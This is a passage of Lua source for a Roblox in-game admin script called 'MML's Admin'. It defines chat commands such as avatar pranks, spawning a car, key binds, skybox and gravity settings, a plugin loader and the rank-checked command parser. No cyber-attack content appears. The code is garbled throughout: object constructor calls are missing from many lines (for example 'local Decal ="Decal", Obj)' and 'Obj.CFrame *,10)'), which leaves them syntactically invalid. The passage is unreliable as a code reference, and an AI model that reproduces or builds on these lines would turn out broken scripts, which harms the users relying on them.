  8363. [{"hasasset", "ownsasset"}] = {"player num(ID)", "Shows if player has asset num(ID)", 2, "Member", false, function(Speaker, Rank, Arguments)
  8364. if tonumber(Arguments[2]) then
  8365. local Players = STRING:Scan(Arguments[1], Speaker)
  8366. local List = {}
  8367. for _,Player in pairs(Players) do
  8368. if Server.MPS:PlayerOwnsAsset(Player, tonumber(Arguments[2])) then
  8369. table.insert(List, Player.Name)
  8370. end
  8371. end
  8372. GUI:ListGui(Speaker, "Players who have asset ID: "..Arguments[2], List, 23916171)
  8373. end
  8374. end};
  8376. [{"reck", "rek", "rekt", "shrekt", "wreck", "noscope", "mlg"}] = {"player", "rekts player in a haxy way", 1, "Member", true, function(Speaker, Rank, Arguments)
  8377. local Players = STRING:Scan(Arguments[1], Speaker)
  8378. for _,Player in pairs(Players) do
  8379. if Player.Character and Player.Character:FindFirstChild("Head") then
  8380. local Char = Player.Character
  8381. Char:BreakJoints()
  8382. CORE:ScanItems(Char, {"BasePart"}, function(Obj)
  8383. Obj.Anchored = true
  8384. for _,Face in pairs({"Top", "Bottom", "Right", "Left", "Front", "Back"}) do
  8385. local Decal ="Decal", Obj)
  8386. Decal.Texture = "rbxassetid://178913323"
  8387. Decal.Face = Face
  8388. end
  8389. end)
  8390. local Sound1 = SOUND:MakeSound(Char.Head, 131509782, 1, 1)
  8391. local Sound2 = SOUND:MakeSound(Char.Head, 179497874, 1, 1)
  8392. Sound1:Play() Sound2:Play()
  8393. coroutine.wrap(function()
  8394. coroutine.wrap(function() wait(4.9) Sound1:Stop() Sound2:Stop() end)()
  8395. repeat wait()
  8396. CORE:ScanItems(Char, {"BasePart"}, function(Obj)
  8397. SOUND:MakeSound(Char.Head, "rbxasset://sounds/uuhhh.mp3", 1, math.random(80,120)/100):Play()
  8398. Obj.Transparency = math.random(0,30)/100
  8399. Obj.Reflectance = math.random(0,50)/100
  8400. Obj.CFrame = Obj.CFrame *,10),math.random(-5,10),math.random(-10,10)) * CFrame.Angles(math.rad(math.random(0,360)),math.rad(math.random(0,360)),math.rad(math.random(0,360)))
  8401. end)
  8402. until Char ~= Player.Character or Char.Parent == nil
  8403. end)()
  8404. end
  8405. end
  8406. end, Hidden = true};
  8408. [{"define", "lookup", "definition"}] = {"string", "Looks up the word on webster's online dictionary", 1, "Member", false, function(Speaker, Rank, Arguments)
  8409. GUI:SendMessage(Speaker, "Definition of "..Arguments[1], REMOTE:DefineWord(Arguments[1]), 185923691)
  8410. end, Http = true};
  8412. [{"neon", "glow"}] = {"player", "Makes player glow like a neon light", 1, "Member", false, function(Speaker, Rank, Arguments)
  8413. local Players = STRING:Scan(Arguments[1], Speaker)
  8414. for _,Player in pairs(Players) do
  8415. if Player.Character then
  8416. CORE:ScanItems(Player.Character, {"BasePart"}, function(Obj)
  8417. Obj.Material = "Neon"
  8418. end)
  8419. end
  8420. end
  8421. end};
  8423. [{"noneon", "noglow", "unneon", "unglow"}] = {"player", "Removes any glowing neon from player", 1, "Member", false, function(Speaker, Rank, Arguments)
  8424. local Players = STRING:Scan(Arguments[1], Speaker)
  8425. for _,Player in pairs(Players) do
  8426. if Player.Character then
  8427. CORE:ScanItems(Player.Character, {"BasePart"}, function(Obj)
  8428. Obj.Material = "Plastic"
  8429. end)
  8430. end
  8431. end
  8432. end};
  8434. [{"asd", "swag"}] = {"player", "Makes player look like a swagger", 1, "Member", true, function(Speaker, Rank, Arguments)
  8435. local Players = STRING:Scan(Arguments[1], Speaker)
  8436. for _,Player in pairs(Players) do
  8437. if Player.Character then
  8438. CORE:ScanItems(Player.Character, {"JointInstance"}, function(Obj)
  8439. Obj.C0 = Obj.C0 *,5),math.random(0,5),math.random(-5,5))
  8440. end)
  8441. end
  8442. end
  8443. end, Hidden = true};
  8445. [{"getpos", "getposition", "playerpos", "playerposition"}] = {"player", "Gets player's position and prompts to add it to waypoints", 1, "Admin", false, function(Speaker, Rank, Arguments)
  8446. local Players = STRING:Scan(Arguments[1], Speaker)
  8447. for _,Player in pairs(Players) do
  8448. if Player.Character and Player.Character:FindFirstChild("Torso") then
  8449. local Pos = Player.Character.Torso.Position
  8450. Pos =, CORE:Round(Pos.Y), CORE:Round(Pos.Z))
  8451. local Answer = GUI:PromptMessageWithButtons(Speaker, Player.Name.."'s position", Player.Name.." is located at ("..tostring(Pos)..") would you like a waypoint under his/her name?", "Question", {"Cancel", "Ok"})
  8452. if Answer == "Ok" then
  8453. CORE:AddWaypoint(Player.Name, Pos, Speaker)
  8454. end
  8455. end
  8456. end
  8457. end};
  8459. [{"point", "find", "laser"}] = {"player1 player2", "Creates a laser that points from player1 to player2", 2, "Member", false, function(Speaker, Rank, Arguments)
  8460. local PlayersFrom = STRING:Scan(Arguments[1], Speaker)
  8461. local PlayersTo = STRING:Scan(Arguments[2], Speaker)
  8462. if PlayersFrom and PlayersTo then
  8463. for _,PlayerFrom in pairs(PlayersFrom) do
  8464. for _,PlayerTo in pairs(PlayersTo) do
  8465. if PlayerFrom.Character and PlayerTo.Character then
  8466. if PlayerFrom.Character:FindFirstChild("Humanoid") and PlayerTo.Character:FindFirstChild("Torso") then coroutine.wrap(function()
  8467. local Laser ="SelectionPartLasso", PlayerFrom.Character) Laser.Humanoid = PlayerFrom.Character.Humanoid Laser.Part = PlayerTo.Character.Torso Laser.Color = GUI:GetNameColor(PlayerTo.Name)
  8468. wait(5)
  8469. Laser:Destroy()
  8470. end)() end
  8471. end
  8472. end
  8473. end
  8474. end
  8475. end};
  8477. [{"ragdoll", "rag"}] = {"player", "Makes player a ragdoll(Removes humanoid)", 1, "Member", false, function(Speaker, Rank, Arguments)
  8478. local Players = STRING:Scan(Arguments[1], Speaker)
  8479. for _,Player in pairs(Players) do
  8480. if Player.Character and Player.Character:FindFirstChild("Humanoid") then
  8481. Player.Character.Humanoid:Destroy()
  8482. end
  8483. end
  8484. end};
  8486. [{"plugins", "getplugins", "pluginlist"}] = {"", "Shows plugins", 0, "Admin", false, function(Speaker, Rank, Arguments)
  8487. if Plugins then
  8488. local List = {}
  8489. for _,Module in pairs(Plugins:GetChildren()) do
  8490. if Module:IsA("ModuleScript") then
  8491. local Enabled = Module:FindFirstChild("Enabled") or {Value = false}
  8492. local Creator = Module:FindFirstChild("Creator") or {Value = "None"}
  8493. local VersionVal = Module:FindFirstChild("Version") or {Value = 1}
  8494. table.insert(List, Module.Name.." V"..VersionVal.Value.." by "..Creator.Value.." | RUNNING: "..STRING:BoolString(Enabled.Value))
  8495. end
  8496. end
  8497. GUI:ListGui(Speaker, "Plugin List", List, "Plugin")
  8498. else
  8499. GUI:SendMessage(Speaker, "Cannot get plugins", "Could not find plugin directory", "Notice", 5)
  8500. end
  8501. end};
  8503. [{"detachchat", "detachc", "dchat", "dc"}] = {"player", "Detaches player's roblox chat gui into a MMLA gui", 1, "Admin", false, function(Speaker, Rank, Arguments)
  8504. local Players = STRING:Scan(Arguments[1], Speaker)
  8505. for _,Player in pairs(Players) do
  8506. GUI:DetachChat(Player)
  8507. end
  8508. end};
  8510. [{"detachmychat", "detachmyc", "dmychat", "dmyc", "detachmchat", "detachmc", "dmchat", "dmc"}] = {"", "Detaches speaker's roblox chat gui into a MMLA gui", 0, "Member", false, function(Speaker, Rank, Arguments)
  8511. GUI:DetachChat(Speaker)
  8512. end};
  8514. [{"truck", "runover"}] = {"player", "Runs player over with a truck", 1, "Member", true, function(Speaker, Rank, Arguments)
  8515. local Players = STRING:Scan(Arguments[1], Speaker)
  8516. for _,Player in pairs(Players) do
  8517. if Player.Character and Player.Character:FindFirstChild("Torso") and Player.Character:FindFirstChild("Humanoid") then
  8518. local Dead = false
  8520. Player.Character.Humanoid.WalkSpeed = 1
  8521. local Torso = Player.Character.Torso
  8522. local Truck ="Part", Workspace) Truck.Name = "Truck" Truck.Size =, 9, 15) Truck.CanCollide = false Truck.Position = Torso.CFrame:toWorldSpace(, 0, -150)).p
  8523. Truck:BreakJoints()
  8524. local Mesh ="SpecialMesh", Truck) Mesh.MeshId = "rbxassetid://52157810" Mesh.TextureId = "rbxassetid://52157085" Mesh.Scale =, 11, 11)
  8525. local BG ="BodyGyro", Truck) BG.maxTorque =, math.huge, math.huge) BG.cframe =, Torso.Position +, (Truck.Size.Y / 2) - 3, 0))
  8526. local BV ="BodyVelocity", Truck) BV.maxForce =, math.huge, math.huge) BV.velocity =, Torso.Position +, (Truck.Size.Y / 2) - 3, 0)).lookVector * 100
  8527. Truck.Touched:connect(function(Part)
  8528. if Dead == false then
  8529. local TouchPlayer = Server.Players:GetPlayerFromCharacter(Part.Parent or Part.Parent.Parent)
  8530. if TouchPlayer == Player then
  8531. Dead = true
  8532. Player.Character:BreakJoints()
  8533. SOUND:MakeSound(Truck, 264486467):Play() -- splat
  8534. end
  8535. end
  8536. end)
  8537. SOUND:MakeSound(Truck, 236746885, 0.5, 2):Play() -- truck
  8538. Delay(1, function() SOUND:MakeSound(Truck, 130802373):Play() end) -- horn
  8539. Delay(5, function()
  8540. Truck:Destroy()
  8541. if Player.Character:FindFirstChild("Humanoid") then
  8542. Player.Character.Humanoid.WalkSpeed = 16
  8543. end
  8544. end)
  8545. end
  8546. end
  8547. end};
  8549. [{"telljoke", "showjoke", "tj", "sj"}] = {"player", "Tells player a random joke", 1, "Admin", true, function(Speaker, Rank, Arguments)
  8550. local Joke = REMOTE:DownloadJoke(Speaker)
  8551. local Players = STRING:Scan(Arguments[1], Speaker)
  8552. for _,Player in pairs(Players) do
  8553. GUI:SendMessage(Player, "Joke", Joke, 19629580)
  8554. end
  8555. end, Http = true};
  8557. [{"joke", "laugh"}] = {"player", "Tells speaker a random joke)", 0, "Member", true, function(Speaker, Rank, Arguments)
  8558. local Joke = REMOTE:DownloadJoke(Speaker)
  8559. GUI:SendMessage(Speaker, "Joke for you", Joke, 19629580)
  8560. end, Http = true};
  8562. [{"doge", "dog"}] = {"player", "Turns player into doge", 1, "Member", true, function(Speaker, Rank, Arguments)
  8563. local Players = STRING:Scan(Arguments[1], Speaker)
  8564. for _,Player in pairs(Players) do
  8565. if Player.Character and Player.Character:FindFirstChild("Torso") and Player.Character:FindFirstChild("Head") and Player.Character:FindFirstChild("Humanoid") then
  8566. CORE:InvisiblePlayer(Player)
  8567. local DogContainer ="Model", Player.Character)
  8568. DogContainer.Name = "Doge"
  8569. local Dog = CORE:Insert(257489726, DogContainer, true)
  8570. Dog.Head.Transparency = 0.99
  8571. Dog.Name = Player.Name
  8572. Dog:MoveTo(Player.Character.Torso.Position)
  8573. local Weld ="Weld", Dog.Torso)
  8574. Weld.Part0 = Player.Character.Torso
  8575. Weld.Part1 = Dog.Torso
  8576. Weld.C0 =,-0.4,0)
  8577. for _,Obj in pairs(Dog:GetChildren()) do
  8578. if Obj:IsA("BasePart") then
  8579. Obj.CanCollide = false
  8580. end
  8581. end
  8583. CORE:ExecuteResource("SetCameraSubject", Dog:FindFirstChild("Humanoid"), {})
  8584. end
  8585. end
  8586. end};
  8588. [{"bindkey", "keybind", "bind", "kb", "bk"}] = {"string(key) string(command)", "Binds the key press of speaker into a command", 2, "Admin", false, function(Speaker, Rank, Arguments)
  8589. local Key = string.lower(string.sub(Arguments[1],1,1))
  8590. KeyBinds[Speaker.UserId][Key] = Arguments[2]
  8591. GUI:SendHint(Speaker, "Binded the '"..Key.."' key to "..Arguments[2])
  8592. end};
  8594. [{"nobindkey", "nokeybind", "nobind", "nkb", "nbk", "unbindkey", "unkeybind", "unbind", "ukb", "ubk"}] = {"string(key)", "Unbinds speaker's keys binding to a command", 1, "Admin", false, function(Speaker, Rank, Arguments)
  8595. local Key = string.lower(string.sub(Arguments[1],1,1))
  8596. KeyBinds[Speaker.UserId][Key] = nil
  8597. GUI:SendHint(Speaker, "Unbinded the '"..Key.."' key")
  8598. end};
  8600. [{"clearkeybinds", "clearbinds", "clearb", "clearkeys", "unbindallkeys"}] = {"", "Clears all of speaker's key binds", 0, "Admin", false, function(Speaker, Rank, Arguments)
  8601. KeyBinds[Speaker.UserId] = {}
  8602. GUI:SendHint(Speaker, "Unbinded all keys")
  8603. end};
  8605. [{"forcebindkey", "forcekeybind", "forcebind", "fkb", "fbk"}] = {"player string(key) string(command)", "Binds the key press of player into a command", 3, "Owner", false, function(Speaker, Rank, Arguments)
  8606. local Players = STRING:Scan(Arguments[1], Speaker)
  8607. local Key = string.lower(string.sub(Arguments[2],1,1))
  8608. for _,Player in pairs(Players) do
  8609. KeyBinds[Player.UserId][Key] = Arguments[3]
  8610. GUI:SendHint(Player, "Binded the '"..Key.."' key to "..Arguments[3])
  8611. end
  8612. end};
  8614. [{"forcenobindkey", "forcenokeybind", "forcenobind", "fnkb", "fnbk", "forceunbindkey", "forceunkeybind", "forceunbind", "fukb", "fubk"}] = {"player string(key)", "Unbinds player's keys binding to a command", 2, "Owner", false, function(Speaker, Rank, Arguments)
  8615. local Players = STRING:Scan(Arguments[1], Speaker)
  8616. local Key = string.lower(string.sub(Arguments[2],1,1))
  8617. for _,Player in pairs(Players) do
  8618. KeyBinds[Player.UserId][Key] = nil
  8619. GUI:SendHint(Player, "Unbinded the '"..Key.."' key")
  8620. end
  8621. end};
  8623. [{"forceclearkeybinds", "forceclearbinds", "forceclearb", "fclearb", "forceclearkeys", "forceunbindallkeys"}] = {"player", "Clears all of player's key binds", 1, "Owner", false, function(Speaker, Rank, Arguments)
  8624. local Players = STRING:Scan(Arguments[1], Speaker)
  8625. for _,Player in pairs(Players) do
  8626. KeyBinds[Player.UserId] = {}
  8627. GUI:SendHint(Player, "Unbinded all keys")
  8628. end
  8629. end};
  8631. [{"keybinds", "keys", "binds", "viewkeybinds", "viewkeys", "viewkeybinds", "showkeybinds", "showkeys", "showbinds", "vkb", "skb"}] = {"player", "Shows all of player's key binds", 1, "Admin", false, function(Speaker, Rank, Arguments)
  8632. local Players = STRING:Scan(Arguments[1], Speaker)
  8633. local Binds = {}
  8634. for _,Player in pairs(Players) do
  8635. for Key,Bind in pairs(KeyBinds[Player.UserId]) do
  8636. table.insert(Binds, Player.Name..": '"..Key.."' binds to command: "..Bind)
  8637. end
  8638. end
  8639. GUI:ListGui(Speaker, "Key Bindings", Binds, 218580411)
  8640. end};
  8642. [{"crown"}] = {"player string(mesh) string(color)", "Gives player a crown with the color of string(color) and the mesh of string(mesh)", 1, "Member", false, function(Speaker, Rank, Arguments)
  8643. local ChatSplit = STRING:GetSplit(Arguments[1], 2, Settings.Bet) or {}
  8644. local Players = STRING:Scan(ChatSplit[1], Speaker)
  8645. for _,Player in pairs(Players) do
  8646. if Crowns[Player.UserId] then
  8647. Crowns[Player.UserId]:Destroy()
  8648. Crowns[Player.UserId] = nil
  8649. wait()
  8650. end
  8651. CORE:Crown(Player, ChatSplit[2], ChatSplit[3])
  8652. end
  8653. end};
  8655. [{"nocrown", "uncrown", "decrown"}] = {"player", "Removes player's crown", 1, "Member", false, function(Speaker, Rank, Arguments)
  8656. local Players = STRING:Scan(Arguments[1], Speaker)
  8657. for _,Player in pairs(Players) do
  8658. if Crowns[Player.UserId] then
  8659. Crowns[Player.UserId]:Destroy()
  8660. Crowns[Player.UserId] = nil
  8661. end
  8662. end
  8663. end};
  8665. [{"meshes", "meshlist", "viewmeshes"}] = {"", "Lists meshes to speaker", 0, "Member", false, function(Speaker, Rank, Arguments)
  8666. local MeshList = {}
  8667. for MeshName,Data in pairs(Meshes) do
  8668. table.insert(MeshList, string.upper(string.sub(MeshName,1,1))..string.sub(MeshName,2).." ( ID: "..Data[2].." )")
  8669. end
  8670. GUI:ListGui(Speaker, "Mesh List", MeshList, 186369377)
  8671. end};
  8673. [{"fixsounds", "fixmusic", "fixs"}] = {"", "Scans workspaces and stops any sounds", 0, "Admin", false, function(Speaker, Rank, Arguments)
  8674. CORE:ScanItems(Server.Workspace, {"Sound"}, function(Obj) Obj:Stop() end)
  8675. end};
  8677. [{"santa", "hoho", "christmas"}] = {"player", "Turns player into jolly saint nick!", 1, "Member", true, function(Speaker, Rank, Arguments)
  8678. local Players = STRING:Scan(Arguments[1], Speaker)
  8679. for _,Player in pairs(Players) do
  8680. if Player.Character and Player.Character:FindFirstChild("Head") and Player.Character.Head:FindFirstChild("face") then
  8681. ypcall(function() Player.Character.Torso.roblox:Destroy() end)
  8682. Player:ClearCharacterAppearance()
  8683. CORE:GivePackage(Player, 41851073)
  8684. CORE:Insert(19398728, Player.Character, true).Handle.Mesh.TextureId = "rbxassetid://19744384"
  8685. Player.Character.Head.face.Texture = "rbxassetid://7699086"
  8686. end
  8687. end
  8688. end};
  8690. [{"car"}] = {"player color", "Spawns the best sports car in existance to player. If color argument is provided, it will color it.", 1, "Member", true, function(Speaker, Rank, Arguments)
  8691. local Arguments = STRING:GetSplit(Arguments[1], 2, Settings.Bet)
  8692. local Players = STRING:Scan(Arguments[1], Speaker)
  8693. for _,Player in pairs(Players) do
  8694. if Cars[Player.UserId] then Cars[Player.UserId]:Destroy() end
  8695. local Car = CORE:Insert(10479801, Server.Workspace, true)
  8696. local Body = Car["Motor (torque)Chassis"].Part
  8697. Cars[Player.UserId] = Car
  8698. Car:MakeJoints()
  8699. Car.VehicleSeat.MaxSpeed = 50
  8700. Car.VehicleSeat.TurnSpeed = 1.5
  8701. CORE:ScanItems(Car, {"BasePart"}, function(Obj) Obj.Locked = true end)
  8702. if Arguments[2] and GUI:GetColor(Arguments[2]) then
  8703. Body.Color = GUI:GetColor(Arguments[2])
  8704. else
  8705. Body.BrickColor = GUI:GetNameColor(Player.Name)
  8706. end
  8707. for _,Part in pairs(Car["Motor (torque)Chassis"]:GetChildren()) do
  8708. if Part.Name ~= "Part" then
  8709. Part.BrickColor ="Really black")
  8710. Part.Friction = 0.7
  8711. end
  8712. end
  8713. local Light ="SpotLight", Body)
  8714. Light.Face = "Back"
  8715. Light.Brightness = 5
  8716. Light.Range = 20
  8717. Light.Color =,1,1)
  8718. if Player.Character and Player.Character.Torso then
  8719. Car:MoveTo(Player.Character.Torso.Position +, 5, 0))
  8720. Player.Character.Torso.CFrame = +, 0.3, 0))
  8721. --[[local Weld ="Weld", Car.VehicleSeat)
  8722. Weld.Part0 = Car.VehicleSeat
  8723. Weld.Part1 = Player.Character.Torso
  8724. coroutine.wrap(function() wait(0.1) Weld:Destroy() end)()]]
  8725. Delay(0.4, function()
  8726. Car.VehicleSeat.Velocity =, 0, -25)).p
  8727. wait(0.1)
  8728. Car.VehicleSeat.Velocity =, 0, 25)).p
  8729. end)
  8730. end
  8731. local SoundID = 147944604
  8732. if RANK:GetRank(Player) == "Owner" then
  8733. SoundID = 133313356
  8734. Car.VehicleSeat.MaxSpeed = 80
  8735. Body.Material = "DiamondPlate"
  8736. Car.VehicleSeat.Torque = 11
  8737. end
  8738. local Engine = SOUND:MakeSound(Car.VehicleSeat, SoundID, 0.5, 1, true)
  8739. Engine:Play()
  8740. coroutine.wrap(function() while wait() and Car and Car:FindFirstChild("VehicleSeat") do
  8741. Engine.Pitch = (Car.VehicleSeat.Velocity.magnitude/50) + 1
  8742. end if Engine then Engine:Stop() end end)()
  8743. end
  8744. end};
  8746. [{"nocar", "uncar"}] = {"player", "Removes player's car", 1, "Member", true, function(Speaker, Rank, Arguments)
  8747. local Players = STRING:Scan(Arguments[1], Speaker)
  8748. for _,Player in pairs(Players) do
  8749. if Cars[Player.UserId] then
  8750. Cars[Player.UserId]:Destroy()
  8751. end
  8752. end
  8753. end};
  8755. [{"clearcars", "nocars", "ccars"}] = {"", "Removes all cars", 0, "Member", false, function(Speaker, Rank, Arguments)
  8756. for _,Car in pairs(Cars) do
  8757. Car:Destroy()
  8758. end
  8759. Cars = {}
  8760. end};
  8762. [{"restarttrello", "repairtrello", "reboottrello", "trellorestart", "trellorepair", "trelloreboot"}] = {"", "Restarts trello service. Will repair broken boards/lists/cards if needed.", 0, "Owner", false, function(Speaker, Rank, Arguments)
  8763. ypcall(function() Trello.RequiredLists = REMOTE:Decode(Server.HS:GetAsync(""..Trello.AdminBoardID.."/lists", true)) end)
  8764. if #Trello.RequiredLists > 0 then
  8765. print("Restarting Trello")
  8766. Trello.MainBoard = REMOTE:TrelloGetAdminBoard()
  8767. local Lists = REMOTE:TrelloGetAdminLists(Trello.MainBoard)
  8768. REMOTE:TrelloCacheData(Lists)
  8769. end
  8770. end, Http = true};
  8772. [{"stringreplacements", "replacements", "stringoperations", "stringformats", "stringformatting", "stringreps", "stringops", "stringfmts", "strreplacements", "stroperations", "strformat", "strformatting", "strreps", "strops", "strfmts", "strfmt"}] = {"", "Lists all string replacement operations", 0, "Member", false, function(Speaker, Rank, Arguments)
  8773. local Operations = {}
  8774. for _,ReplaceData in pairs(StringReplacements) do
  8775. local Replacement = ReplaceData[1]
  8776. if type(Replacement) == "table" then
  8777. Replacement = ReplaceData[1][1]
  8778. end
  8779. table.insert(Operations, "Replacement: "..Replacement.." | Description: "..ReplaceData[2].." | Example: "..string.sub(ReplaceData[4](Speaker),1,20))
  8780. end
  8781. GUI:ListGui(Speaker, "String Replacement Operations", Operations, 61993831)
  8782. end};
  8784. [{"soundinfo", "songinfo", "musicinfo", "sinfo", "minfo"}] = {"", "Shows information about the current sound playing to speaker", 0, "Member", false, function(Speaker, Rank, Arguments)
  8785. GUI:SoundInfo(Speaker)
  8786. end};
  8788. [{"showsoundinfo", "showsonginfo", "showmusicinfo", "showsinfo", "showminfo", "forcesoundinfo", "forcesonginfo", "forcemusicinfo", "forcesinfo", "forceminfo"}] = {"player", "Shows information about the current sound playing to player", 1, "Member", false, function(Speaker, Rank, Arguments)
  8789. local Players = STRING:Scan(Arguments[1], Speaker)
  8790. for _,Player in pairs(Players) do
  8791. GUI:SoundInfo(Player)
  8792. end
  8793. end};
  8795. [{"gravity", "grav"}] = {"num", "Sets the server gravity to number(percent, 100 would be normal gravity, 0 would be none)", 1, "Admin", false, function(Speaker, Rank, Arguments)
  8796. if tonumber(Arguments[1]) then
  8797. Server.Workspace.Gravity = tonumber(Arguments[1]) * (196.2/100)
  8798. end
  8799. end};
  8801. [{"accessorytypes", "acstypes", "atypes", "listaccessorytypes", "listacstypes", "listatypes", "latypes", "lat"}] = {"", "Lists the different types of accessory subcategories", 0, "Member", false, function(Speaker, Rank, Arguments)
  8802. local Types = {}
  8803. for Type,_ in pairs(Assets.AccessoryTypes) do
  8804. table.insert(Types, string.sub(string.upper(Type), 1,1)..string.sub(string.lower(Type), 2))
  8805. end
  8806. GUI:ListGui(Speaker, "Accessory types", Types, 36775144)
  8807. end};
  8809. [{"skybox", "sky", "setskybox", "setsky"}] = {"string(face) num(ID)", "Sets the skybox of string(face)(which is front,back,left,right,up,down) to num(ID)", 1, "Admin", false, function(Speaker, Rank, Arguments)
  8810. local Sky = Server.Lighting:FindFirstChild("Sky")
  8811. if not Sky then Sky ="Sky", Server.Lighting) end
  8812. local Faces = {["front"] = "SkyboxFt", ["back"] = "SkyboxBk", ["left"] = "SkyboxLf", ["right"] = "SkyboxRt", ["up"] = "SkyboxUp", ["down"] = "SkyboxDn"}
  8813. local Face = nil
  8814. local SkyID = string.lower(Arguments[1])
  8815. local Arguments = STRING:GetSplit(SkyID, 2, Settings.Bet)
  8816. if #Arguments == 2 and tonumber(Arguments[2]) then
  8817. Face = Arguments[1]
  8818. SkyID = Arguments[2]
  8819. end
  8820. if tonumber(SkyID) then
  8821. local ImageID = MARKET:GetImageFormat(tonumber(SkyID))
  8822. if Face and Faces[Face] then
  8823. Sky[Faces[Face]] = "rbxassetid://"..ImageID
  8824. else
  8825. for _,Face in pairs(Faces) do
  8826. Sky[Face] = "rbxassetid://"..ImageID
  8827. end
  8828. end
  8829. else
  8830. GUI:SendMessage(Speaker, "Sky is not an ID", "Sky ID argument is not a number", "Notice")
  8831. end
  8832. end};
  8834. [{"noskybox", "nosky", "unskybox", "unsetskybox"}] = {"", "Removes the current skybox from Lighting", 0, "Admin", false, function(Speaker, Rank, Arguments)
  8835. CORE:ScanItems(Server.Lighting, {"Sky"}, function(Obj)
  8836. Obj:Destroy()
  8837. end)
  8838. end};
  8839. --
  8840. }
  8842. if Plugins then
  8843. local PluginNum = 0
  8844. for _,Module in pairs(Plugins:GetChildren()) do
  8845. if Module:IsA("ModuleScript") then
  8846. local Enabled = Module:FindFirstChild("Enabled") or {Value = false}
  8847. local Creator = Module:FindFirstChild("Creator") or {Value = "None"}
  8848. local VersionVal = Module:FindFirstChild("Version") or {Value = 1}
  8849. if Enabled.Value == true then
  8850. PluginNum = PluginNum + 1
  8851. local PluginExe = require(Module)
  8852. for Var,Val in pairs(getfenv()) do
  8853. getfenv(PluginExe)[Var] = Val
  8854. end
  8855. getfenv(PluginExe).SOUND,getfenv(PluginExe).MARKET,getfenv(PluginExe).RANK,getfenv(PluginExe).STRING,getfenv(PluginExe).GUI,getfenv(PluginExe).CORE,getfenv(PluginExe).REMOTE = SOUND,MARKET,RANK,STRING,GUI,CORE,REMOTE
  8856. getfenv(PluginExe).script = Module
  8857. getfenv(PluginExe).Script = Module
  8858. getfenv(PluginExe).Version = Version
  8859. local Suc, Error = ypcall(coroutine.wrap(PluginExe))
  8860. if not Suc then
  8861. Server.TestS:Error("MML's Admin Plugin; "..CORE:HandleError(Error), Module)
  8862. else
  8863. Server.TestS:Message("Executed MML's Admin Plugin #"..PluginNum.." : "..Module.Name.." V"..VersionVal.Value.." by "..Creator.Value)
  8864. end
  8865. end
  8866. end
  8867. end
  8868. end
  8870. function CORE:Chatted(RawMainMessage, Speaker, NoPrefixNeeded, FakePlayerName, FakeRank, MakeSupremeOwner)
  8871. if not CORE:NilPlayer(Speaker) and string.lower(RawMainMessage) == "settings" then
  8872. GUI:SettingsGui(Speaker)
  8873. return nil
  8874. end
  8875. if NoPrefixNeeded == nil then NoPrefixNeeded = false end
  8876. local Prefix = Settings.Prefix
  8877. if NoPrefixNeeded == true and string.sub(string.lower(RawMainMessage),1,#Prefix) ~= string.lower(Prefix) then Prefix = "" end
  8878. if RawMainMessage == "" or RawMainMessage == Prefix then return end
  8879. if string.sub(string.lower(RawMainMessage),1,#Prefix) ~= string.lower(Prefix) then return end
  8880. if Speaker == nil then
  8881. if FakeRank then
  8882. if string.lower(FakeRank) ~= "owner" and string.lower(FakeRank) ~= "admin" and string.lower(FakeRank) ~= "member" and string.lower(FakeRank) ~= "non-admin" then
  8883. FakeRank = "Owner"
  8884. end
  8885. else
  8886. FakeRank = "Owner"
  8887. end
  8888. FakeRank = string.sub(string.upper(FakeRank),1,1)..string.sub(string.lower(FakeRank),2)
  8889. if FakeRank == "Non-admin" then FakeRank = "Non-Admin" end
  8890. Speaker = {
  8891. Name = FakePlayerName or "[ Server ]";
  8892. Character = nil;
  8893. userId = 1;
  8894. PlayerGui = nil;
  8895. Rank = FakeRank or "Owner";
  8896. MakeSupremeOwner = MakeSupremeOwner;
  8897. }
  8898. end
  8899. local Rank = RANK:GetRank(Speaker)
  8900. local RawMessage = string.sub(RawMainMessage, #Prefix+1)
  8902. if RawMessage and RawMessage ~= "" or RawMessage ~= Settings.Bet then
  8903. if NoPrefixNeeded then Prefix = "" end
  8904. local Messages = STRING:GetSplit(RawMessage, nil, "@@"..Prefix)
  8906. for _,Message in pairs(Messages) do
  8907. for Cmds,Data in pairs(Commands) do -- check all commands
  8908. local MessageSplit = STRING:GetSplit(Message, Data[3], Settings.Bet)
  8910. if not MessageSplit then break end
  8912. local CommandSaid = false
  8913. for _,Command in pairs(Cmds) do
  8914. if string.lower(Command) == string.lower(MessageSplit[1]) then -- is the command said?
  8915. CommandSaid = true
  8916. break
  8917. end
  8918. end
  8919. if CommandSaid == true then -- command said?
  8920. local ExecuteExcuse = ""
  8921. if RANK:ConvertRank(Rank) >= RANK:ConvertRank(Data[4]) then -- check rank
  8922. if Rank ~= "Owner" and Settings.Fun == false and Data[5] == true then
  8923. ExecuteExcuse = "This command cannot be executed as it is a fun command"
  8924. end
  8925. if Data.Abusable == true and Rank == "Member" and Settings.DisableAbuse == true then
  8926. ExecuteExcuse = "This command cannot be executed because it is considered abusable by the owner"
  8927. end
  8928. else
  8929. ExecuteExcuse = "This command cannot be executed because your rank is not high enough (Minimum rank: "..Data[4]..")"
  8930. end
  8931. if ExecuteExcuse == "" then
  8932. if #MessageSplit - 1 < Data[3] then
  8933. ExecuteExcuse = "This command cannot be executed because an invalid number of arguments has been supplied (You supplied "..(#MessageSplit - 1).."/"..Data[3].."). Arguments are: "..Data[1]
  8934. end
  8935. end
  8936. if ExecuteExcuse == "" then
  8937. CORE:Log(CommandLogs, Speaker, Message)
  8938. table.remove(MessageSplit, 1)
  8939. coroutine.wrap(function() wait()
  8940. local DidExe, Error = ypcall(function() Data[6](Speaker, Rank, MessageSplit) end)
  8941. if not DidExe then
  8942. if CORE:NilPlayer(Speaker) then
  8943. print("Error: "..Error)
  8944. else
  8945. CORE:HandleError(Error, Speaker)
  8946. end
  8947. end
  8948. end)()
  8949. coroutine.wrap(function() wait(0.05)
  8950. if Settings.ExecuteNotificationSound and tonumber(Settings.ExecuteNotificationSound) > 0 then
  8951. local ExeSound = SOUND:MakeSound(Server.Workspace, Settings.ExecuteNotificationSound, 0.5, 1)
  8952. ExeSound:Play()
  8953. wait(3)
  8954. ExeSound:Stop()
  8955. ExeSound:Destroy()
  8956. end
  8957. end)()
  8958. elseif type(Speaker) == "userdata" then
  8959. GUI:SendMessage(Speaker, "Unable to execute", "RED "..ExecuteExcuse, "Error")
  8960. end
  8961. break
  8962. end
  8963. end
  8964. end
  8965. end
  8966. end
  8968. function CORE:Start(Player) coroutine.wrap(function()
  8969. wait(0.1)
  8970. if Player then
  8971. coroutine.wrap(function()
  8972. repeat wait(1) until DataReady == true
  8973. DataReady = false
  8974. ypcall(function()
  8975. local Players = Server.Data:GetDataStore("MML's Admin"):GetAsync("Players")
